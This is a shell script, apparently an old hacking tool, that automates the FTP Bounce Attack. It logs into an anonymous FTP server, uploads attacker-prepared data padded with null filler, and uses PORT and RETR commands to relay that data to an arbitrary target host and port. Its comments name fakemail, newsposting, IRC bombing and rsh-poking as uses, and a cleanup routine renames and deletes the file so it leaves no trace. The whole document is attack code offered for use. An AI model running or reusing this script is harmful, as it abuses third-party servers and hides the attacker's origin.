#! /bin/sh
# Whang stdin thru an FTP site to a target.  Implements the Bounce Attack
# for fakemail, newsposting, irc-bombing, rsh-poking, or anything else
# involving transfer of data *to* the target host.

# REQUIRES::
# stdin: contents; temporarily assembled in /tmp/.i<pid>
# /tmp/filler: 256 lines of 250 nulls each; about 64k worth
# ARGS::
# target site: name or IP [hopefully nslookup will deal]
# target port: numeric; this handles generating hibyte,lobyte
# bounce site: ideally, non-WU with writeable dirs and no identd???
# bounce file: *full path* of w-file over there; this DTRTs with the name
# option:
#	blank -> create, bounce, reconnect and delete
#	c -> create it, bounce it, but don't delete just yet
#	y -> it's already there, just re-bounce it and don't delete
#	d -> dont transfer anything, just delete [for cleanup]

test "$4" = "" && echo "Bad args, read the script" && exit 1
test ! -f /tmp/filler && echo "Cant find /tmp/filler; construct it!" && exit 1

TNAME=/tmp/.i$$

# construct necessaries for PORT commands
TPORTH=`echo "0 k $2 256 / p q" | dc`
TPORTL=`echo "0 k $2 d 256 / 256 * - p q" | dc`
# "host" is pretty common these days; try it...
THOST=`host -t a "${1}" | fgrep 'has address '| head -1 | \
  sed -e 's/.*[	 ]//' -e 's/\./,/g'`
# if you can't find "host", this works but loses for multihomed machines.
# THOST=`nslookup -query=a "${1}" | tail +3 | grep 'ddress:' | \
#   sed -e 's/.*[	 ]//' -e 's/\./,/g'`
TARGET="${THOST},${TPORTH},${TPORTL}"

# split filespec into dir/file
FDIR=`echo "${4}" | sed 's/\(.*\)\/.*/\1/'`
FFILE=`echo "${4}" | sed 's/.*\///'`

# select actions by various preloads.  $5 is our action-flag...
XARG="${5}"
if test "$5" = "" ; then
  XARG='c'
fi

# Construct the dirty, ship it over and forward to target.  We don't delete
# yet because many ftp servers crash when the retr-to-target fails in weird
# ways, and we might want to keep the file around for a bit... Take out "ascii"
# line if need be
if test "$XARG" = "c" ; then
  echo sending $TNAME to $TARGET via $3 : $FDIR / $FFILE >&2
  cat - /tmp/filler > $TNAME
  ftp -n << EOF
  open $3
  prompt
  quo "user ftp"
  quo "pass -root@"
  cd $FDIR
  binary
  put $TNAME $FFILE
  ascii
  quo "PORT $TARGET"
  quo "RETR $FFILE"
EOF
fi

# re-whang handler, called only if xarg is "y"
test "$XARG" = "y" && ftp -n << EOF
  open $3
  prompt
  quo "user ftp"
  quo "pass -root@"
  cd $FDIR
  ascii
  quo "PORT $TARGET"
  quo "RETR $FFILE"
EOF

if test "${5}" = "" ; then
  XARG='d'
fi

# delete handler.  A bit fancy 'cause some servers disallow delete and/or
# rename, and some allow rename even though they thought otherwise, heh heh.
# In any case, make damn sure the thing is gonzo.
if test "$XARG" = "d" ; then
  echo "test" > $TNAME
  ftp -n << EOF
  open $3
  prompt
  quo "user ftp"
  quo "pass -root@"
  cd $FDIR
  put $TNAME ${FFILE}
  put $TNAME x${FFILE}
  quo "rnfr x${FFILE}"
  quo "rnfr x${FFILE}"
  quo "rnto $FFILE"
  quo "rnfr ${FFILE}"
  quo "rnfr ${FFILE}"
  quo "rnto x${FFILE}"
  del x${FFILE}
  del $FFILE
  quit
EOF
fi

test -f $TNAME && rm $TNAME
sync
exit 0
